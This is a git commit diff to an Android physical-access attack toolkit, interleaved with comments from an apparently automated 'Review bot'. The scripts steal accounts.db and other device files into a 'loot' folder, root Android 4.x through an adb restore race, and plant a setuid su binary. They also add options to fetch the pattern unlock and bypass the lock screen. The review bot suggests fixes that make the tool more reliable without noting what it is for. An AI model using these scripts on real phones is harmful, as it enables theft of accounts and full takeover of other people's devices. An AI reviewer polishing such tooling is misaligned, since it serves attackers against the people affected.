
Fixed issue #2 by Hackrylix. Now gets JB user's accounts.db

1 parent 7d3f2de commit 546398ba327394fd9a21f3ef30f61f73986a10cc @kosborn committed Sep 29, 2012
Showing with 60 additions and 24 deletions.
  1. +3 −3 README.md
  2. +8 −11 functions.sh
  3. +1 −1 getSensitive.sh
  4. +1 −1 installAnti.sh
  5. +11 −7 root4.x.sh
  6. +10 −0 run.sh
  7. +26 −1 testDynLoad.sh
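--- a/README.md
+++ b/README.md
@@ -36,6 +36,7 @@ Android requires:
 * **Busybox**
 * A terminal emulator
 * Probably a [USB On the Go cable](http://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Daps&field-keywords=usb+otg)
+ * **Check out Hak5's micro-micro USB cable: [Hak5 Shop](http://hakshop.myshopify.com/products/micro-to-micro-otg)
 PC requires
 * Android SDK (specifically, you nee adb)
@@ -53,11 +54,10 @@ Running
 Targets known to be working:
 * AOKP Milestone 5
 * CyanogenMod
- * Busybox 1.20.0
- * Probably others, all they really need at the moent is busybox
 Targets that still have some issues:
 * Stock Android (Still figuring out the best methods to re-implement everything with a limited shell environment)
+ * **Note! Stock Android is now working, busybox is now PUSHED to the device**
 As necessary, I'll start expanding and building checks against certain ROMs/toolkit versions to create maximum damage.
@@ -91,4 +91,4 @@ Me, you're welcome. [@theKos](https://twitter.com/#!/thekos)
 License
 -------
-GPLv2
+GPLv3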
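--- a/functions.sh
+++ b/functions.sh
@@ -48,11 +48,6 @@ else
 exit
 fi
-# Let's just push busybox, because screw making stock roms compatible
-# (This will bite me in the ass when we get any non-ARM6/7 arch. proc.)
-ourBBPath=/data/local/tmp/busybox
-adb push includes/busybox-static $ourBBPath
-
 # ADB wrapper to easy root pain...
 command(){
 echo "$*" > $TMP/p2p-tmp
@@ -118,7 +113,7 @@ isRoot(){
 # Check the size of a directory or more
 dataSize(){
- command "du -hc $*" | tail -n1
+ command "/data/local/tmp/busybox du -hc $*" | tail -n1
 }
@@ -140,8 +135,10 @@ getData(){
 # Actually get the file
 getDataProto(){
 FILENAME=jacked_$(date +%s).tar
- command "tar -cf - $* 2>/dev/null | ${ourBBPath} base64 " | tr -d "\r" | base64 -d > $FILENAME
- echo "The file has been saved as $FILENAME"
+ SAUCEDIR=loot/
+ mkdir $SAUCEDIR 2>/dev/null
+ command "/data/local/tmp/busybox tar -cf - $* 2>/dev/null | /data/local/tmp/busybox base64 " | tr -d "\r" | base64 -d > ${SAUCEDIR}/$FILENAME
+ echo "The file has been saved as ${SAUCEDIR}/${FILENAME}"
 }
@@ -173,16 +170,16 @@ getSearch(){
 # Actually get the file
 getSearchProto(){
 FILENAME=jacked_$(date +%s).tar
- command "${ourBBPath} find $1 -iname '$2' -type f -size $3 -exec tar -cf - {} \; 2>/dev/null | base64 " | tr -d "\r" | base64 -d > $FILENAME
+ command "/data/local/tmp/busybox find $1 -iname '$2' -type f -size $3 -exec tar -cf - {} \; 2>/dev/null | base64 " | tr -d "\r" | base64 -d > $FILENAME
 echo "The file has been saved as $FILENAME"
 }
 search(){
- command "${ourBBPath} find $1 -iname '$2' -type f -size $3 -exec ls {} \;"
+ command "/data/local/tmp/busybox find $1 -iname '$2' -type f -size $3 -exec ls {} \;"
 }
 size(){
- command "${ourBBPath} find $1 -iname \"$2\" -type f -size $3 -print0 | xargs -0 du -ch|tail -n1"
+ command "/data/local/tmp/busybox find $1 -iname \"$2\" -type f -size $3 -print0 | /data/local/tmp/busybox xargs -0 /data/local/tmp/busybox du -ch|tail -n1"
 }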
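Review bot: In getDataProto, `mkdir $SAUCEDIR 2>/dev/null` hides every mkdir failure, not only "already exists", so a permissions problem shows up later as a failed redirect; `mkdir -p -- "$SAUCEDIR" || return 1` would report it at the source. The archive written there holds data pulled from the device, so creating the directory under `umask 077` keeps it from being readable by other local users. `SAUCEDIR=loot/` joined as `${SAUCEDIR}/$FILENAME` produces a doubled slash, and getSearchProto still writes to the current directory, so the two functions now disagree about where output lands. The literal `/data/local/tmp/busybox` replaces `${ourBBPath}` throughout this file; one `readonly` variable defined here would keep the path in a single place.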
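--- a/getSensitive.sh
+++ b/getSensitive.sh
@@ -7,7 +7,7 @@
 echo $ISROOT
 if [ $ISROOT -le 1 ]; then
- DATAPATH="/data/system/accounts.db"
+ DATAPATH="/data/system/accounts.db /data/system/users/0/accounts.db"
 echo 'We are root...'
 getData "$DATAPATH"
 else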
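--- a/installAnti.sh
+++ b/installAnti.sh
@@ -12,5 +12,5 @@ if [ $isInstalled -eq 0 ]; then
 adb uninstall io.kos.antiguard
 else
 adb install ./AntiGuard/AntiGuard.apk
- adb shell am start -S io.kos.antiguard/.unlock
+ adb shell am start io.kos.antiguard/.unlock
 fi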
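--- a/root4.x.sh
+++ b/root4.x.sh
@@ -12,13 +12,17 @@ adb restore modules/extras/fakebackup.ab
 command "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 2>/dev/null; do :; done; echo 'Overwrote local.prop!';"
-if command "cat /data/local.prop" |grep ro.kernel.qemu=1 > /dev/null
+if command "cat /data/local.prop"
 then echo "Succesfully rooted!"
 echo "Requires a reboot..."
- echo "Would you like to reboot? (y/N)"
- read reboot
- case "$reboot" in
- y|Y) adb reboot ;;
- *) echo "" ;;
- esac
+ adb reboot
+ sleep 2
+ adb wait-for-device
+ command "mount -o rw,remount /system"
+ adb push includes/su-static /system/xbin/su
+ command "/data/local/tmp/busybox chown 0:0 /system/xbin/su"
+ command "/data/local/tmp/busybox chmod 6777 /system/xbin/su"
+ adb push includes/Superuser.apk /system/app/
+ command "rm /data/local.prop"
+ adb reboot
 fi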
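Review bot: `chmod 6777` on `/system/xbin/su` leaves a setuid-root binary writable by every user and app on the device, so any process there can replace it; the conventional mode is `6755`, i.e. `command "/data/local/tmp/busybox chmod 6755 /system/xbin/su"`. The rewritten condition `if command "cat /data/local.prop"` no longer inspects the file's contents, so the branch appears to depend only on the exit status of the `command` wrapper, which is defined outside this hunk. With the y/N prompt removed, the device is rebooted twice and `/system` is remounted read-write without operator confirmation. None of the `adb push` or `command` steps is checked before `rm /data/local.prop` and the final reboot, so a failed push still ends in a reboot; an `|| exit 1` after each step would stop early.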
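--- a/run.sh
+++ b/run.sh
@@ -30,6 +30,7 @@ prompt(){
 adb wait-for-device
+
 fi
 # check if we're root!
@@ -38,6 +39,13 @@ prompt(){
 if [ $RUNONCE = 0 ]
 then
+ # Let's just push busybox, because screw making stock roms compatible
+ # (This will bite me in the ass when we get any non-ARM6/7 arch. proc.)
+ ourBBPath=/data/local/tmp/busybox
+ adb push includes/busybox-static $ourBBPath
+ adb shell "chmod 777 /data/local/tmp/busybox"
+ echo "Trying to push busybox..."
+
 ISROOT=$(isRoot noinfo)
 if [ "$ISROOT" = "1" ]
 then
@@ -55,6 +63,7 @@ prompt(){
 5) Steal Accounts
 6) Install/Uninstall AntiGuard
 7) Root 4.x using adb race condition
+ 8) Get pattern unlock!
 x) Exit
 "
 echo -n "Choose wisely: "
@@ -69,6 +78,7 @@ prompt(){
 5) echo "The good stuff.." && . ./getSensitive.sh ;;
 6) echo "Unlocking Screen" && . ./installAnti.sh ;;
 7) echo "Trying to root..." && . ./root4.x.sh ;;
+ 8) echo "Getting gesture..." && . ./getGesture.sh ;;
 'x'|'X') echo "Goodbye." && exit ;;
 *) echo "${bold}That's not an answer!${none}\n" && prompt ;;
 esac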
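Review bot: `adb shell "chmod 777 /data/local/tmp/busybox"` makes the pushed binary world-writable, and the other scripts in this commit appear to run it through the root `command` wrapper, so any process on the device could swap the file before it is executed with elevated rights; `755` is sufficient, e.g. `adb shell "chmod 755 $ourBBPath"`. The chmod hard-codes the path that `ourBBPath` was assigned one line earlier, the `adb push` result is never checked, and "Trying to push busybox..." is printed only after the push has already run. Menu entry 8 sources `./getGesture.sh`, which is not among the seven files in this commit's diffstat, so confirm it already exists in the tree. `prompt()` starts and ends outside these hunks.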
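--- a/testDynLoad.sh
+++ b/testDynLoad.sh
@@ -33,5 +33,30 @@ done
 echo "Select a command:"
 read userCommand
+ deviceConnected=isConnected
+ if [ "$(isConnected)" = 'NO' ]; then eval $(echo '$COMMAND'$userCommand)
+ echo "Waiting for phone to connect..."
+ # probably a better way to do this... but I don't care!!
+ #while [ "$(isConnected)" = 'NO' ]; do
+ # sleep .1
+ #done
-eval $(echo '$COMMAND'$userCommand)
+ # Found it! Hopefully this won't cause issues
+ adb wait-for-device
+
+
+ fi
+
+ # check if we're root!
+ # Note: This is here because sh's variable scopig doesn't go UP apparently...
+
+
+ if [ $RUNONCE = 0 ]
+ then
+ ISROOT=$(isRoot noinfo)
+ if [ "$ISROOT" = "1" ]
+ then
+ echo 'WE ARE THE ROOT!'
+ RUNONCE=1
+ fi
+ fi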
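Review bot: The `eval $(echo '$COMMAND'$userCommand)` line now sits on the `then` of `if [ "$(isConnected)" = 'NO' ]`, so the selected command runs only when no device is connected; this looks like a paste slip, and the eval probably belongs after the closing `fi`. The eval also expands whatever was typed at `read userCommand`, so anything other than a menu key is executed by the local shell; if the keys are numeric, validate first with `case "$userCommand" in ''|*[!0-9]*) echo "Invalid selection" >&2; exit 1 ;; esac`. `deviceConnected=isConnected` stores the literal string rather than the function's output and is not read in the visible lines. The rest of the added block duplicates the root check from run.sh and could be moved into a shared function.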
